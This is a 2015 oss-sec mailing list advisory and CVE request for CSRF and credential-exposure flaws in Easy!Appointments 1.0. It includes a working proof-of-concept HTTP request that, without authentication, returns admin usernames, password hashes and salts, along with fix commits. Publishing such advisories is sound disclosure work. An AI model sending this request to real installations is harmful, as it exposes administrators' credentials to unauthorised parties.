oss-sec mailing list archives
CVE request: Easy!Appointments 1.0 Cross-Site Request Forgery and Insufficiently Protected Credentials vulnerabilities
From: Henri Salo <henri () nerv fi>
Date: Mon, 27 Jul 2015 16:14:21 +0300
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Product: Easy!Appointments Open Source Appointment Scheduler Product URL: http://easyappointments.org/ Vendor: Alex Tselegidis Vulnerability Type: Cross-Site Request Forgery (CWE-352) Insufficiently Protected Credentials (CWE-522) Vulnerable Versions: 1.0 Fixed Version: next release Vendor Notification: 2015-04-03 Solution Status: Fixed by vendor Solution Date: 2015-05-28 Public Disclosure: 2015-07-27 Vulnerability Details: The web application does not sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request. The application transmits all user credentials to unauthenticated user and possibly allows other unauthorized actions. Proof-of-concept without authentication: """ POST /ea/backend_api/ajax_filter_admins HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.6.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: https://example.com/ea/backend/users Content-Length: 4 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache key= """ Returns: """ HTTP/1.1 200 OK Date: Thu, 09 Apr 2015 10:28:38 GMT Server: Apache/2.2 X-Powered-By: PHP/5.4.39-0+deb7u2 Set-Cookie: ci_session=*removed*; expires=Thu, 09-Apr-2015 12:28:38 GMT; path=/ Keep-Alive: timeout=5, max=500 Connection: Keep-Alive Content-Type: text/html Content-Length: 539 [{"id":"84","first_name":"Henri","last_name":"Salo","email":"email () example com","mobile_number":null,"phone_number":"04012345678","address":null,"city":null,"state":null,"zip_code":null,"notes":null,"id_roles":"1","settings":{"username":"henri","password":"1f40f9a5d17bedf197274fcc1886ef6ef4015b0f883513782d6fa437f8ab9af7","salt":"547ca602bda6a2a97ff4222fb71d61c75436da1ebf86a41c33219d11f1f4568e","working_plan":null,"notifications":"0","google_sync":"0","google_token":null,"google_calendar":null,"sync_past_days":"5","sync_future_days":"5"}}] """ Fixed in following commit: https://github.com/alextselegidis/easyappointments/commit/1f73e7fcbc2c06505178200567ac905ae8570326 Related commits to add CSRF protection: https://github.com/alextselegidis/easyappointments/commit/f223ffa343ad91d046b4469248f6479edf1718d7 https://github.com/alextselegidis/easyappointments/commit/daf4865c290c58b66f73507a0ae1ec41987ad840 https://github.com/alextselegidis/easyappointments/commit/d88c138d2dd35820e355f0d7f3b93db3cc5473e8 https://github.com/alextselegidis/easyappointments/commit/ad8c9b6522c560ac5b6309f62f8b3e2319483d54 https://github.com/alextselegidis/easyappointments/commit/ecbe5600df03ac970e4e743215d3b3be6e1e6860 References: https://scapsync.com/cwe/CWE-352 https://scapsync.com/cwe/CWE-522 https://cwe.mitre.org/data/definitions/352.html https://cwe.mitre.org/data/definitions/522.html https://en.wikipedia.org/wiki/Cross-site_request_forgery https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29 https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29_Prevention_Cheat_Sheet - -- Henri Salo -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux) iQIcBAEBAgAGBQJVti6tAAoJECet96ROqnV0mlwP/R82KPUH15elyTfqeImCsc/6 FpUiZrvQPvW2saPlweec6vLsdr361dZb3wfSLpltyDK/b/XFhRxGOqufjETDfsrr tP5y7OqvpzKisu+itOpsFBiFppuLD3UCK2GsWyFM0JHrcSkOyG5dKQ1LGkQzZObD vG2U6ofB7PRoW0C9iorlUVa7InUt9sEWojwjsONtacbibiLD4jIqui1YUs0Dg9yj QUTBKd8RcSUddkZYzhKIkhBYgdaMdSO1ObE1taLZlK2lfQCI9L5pAXAf4k8YRP5X N+wiX6LfmVcb+8Os0iJpsFZLT9oe0B3Kl1elm51MWFyA00P5M7B8x3svkeH34LUH OBDyE92+LH352zn9nDIpZFeEwoEZTEZak5zAKM0L1i+qXU9LRwwZXahFvY4VyZng mvqf4tZEogJV55q27HaWr1595b7MEHBexiNQmFrC5k9l2fFzVZRnlaIHLYjGvwpf vSFHG8u/YpSmOOM3FM/yRZlgR21jM2cdYIDs5vpQkGfjdSW61CdQwp6m/j1znkqH jjxYiqIhp9me4xEWmAhgm26HkQcpCHlEBwA2N2x9RvnS/Lw6oPHln8dxhu4OP3mr Eq43X2Zz8kQJkZuQnufAzmtMYxvKmzhfVYWREBzhohox+nXImqlAvYxzCQzBEGBE ++lf9BJDbx+CMendxx9Z =cYYp -----END PGP SIGNATURE-----
Current thread:
- CVE request: Easy!Appointments 1.0 Cross-Site Request Forgery and Insufficiently Protected Credentials vulnerabilities Henri Salo (Jul 27)